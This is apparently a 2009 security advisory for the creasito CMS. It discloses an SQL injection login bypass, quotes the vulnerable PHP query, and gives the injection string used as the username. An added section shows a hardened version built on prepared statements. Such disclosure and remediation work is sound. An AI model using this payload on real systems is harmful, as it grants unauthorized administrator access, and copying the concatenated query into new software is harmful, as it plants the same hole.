ID SSV:11074
Type seebug
Reporter Root
Modified 2009-04-21T00:00:00
Description
No description provided by source.
******* Salvatore "drosophila" Fresta *******
[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This CMS is entirely vulnerable to SQL Injection.
I decided to post the authentication bypass security
flaw only.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php
An SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:
...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");
...
*************************************************
[+] Code
- [A] Authentication Bypass
Username: -1' OR '1'='1'#
Password: foo
*************************************************
[+] Fix
No fix.
*************************************************
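The login check from admin/checkuser.php rewritten with a bound parameter, as an added example that is not part of the original advisory or the creasito code base. The table and column names come from the query shown above; the function name check_admin_login, the PDO connection, the in-memory SQLite database standing in for MySQL, and password_hash() storage are assumptions.

```php
<?php
// Added example: hardened form of the query shown in the advisory.
// Assumptions: PDO is available and passwords are stored as password_hash()
// output (the advisory does not show how the application stores them).

function check_admin_login(PDO $db, string $username, string $password): bool
{
    // The placeholder keeps user input out of the SQL text, so quotes and
    // comment characters in $username are compared as data, never parsed.
    $stmt = $db->prepare(
        "SELECT password FROM amministratore
         WHERE username = :username AND activated = '1'"
    );
    $stmt->execute([':username' => $username]);
    $hash = $stmt->fetchColumn();

    // fetchColumn() returns false when no activated row has this username.
    if ($hash === false) {
        return false;
    }
    // The password is verified in PHP against the stored hash instead of
    // being concatenated into the WHERE clause.
    return password_verify($password, $hash);
}

// Constructed demo data: in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE amministratore (username TEXT, password TEXT, activated TEXT)");
$ins = $db->prepare("INSERT INTO amministratore VALUES (?, ?, '1')");
$ins->execute(['admin', password_hash('constructed-secret', PASSWORD_DEFAULT)]);

// The username string from the [+] Code section is now an ordinary literal
// that matches no row; only the constructed account with its password passes.
var_dump(check_admin_login($db, "-1' OR '1'='1'#", 'foo'));
var_dump(check_admin_login($db, 'admin', 'constructed-secret'));
var_dump(check_admin_login($db, 'admin', 'wrong'));
```

Against MySQL the same function works with a pdo_mysql connection; setting PDO::ATTR_EMULATE_PREPARES to false makes the driver use server-side prepared statements.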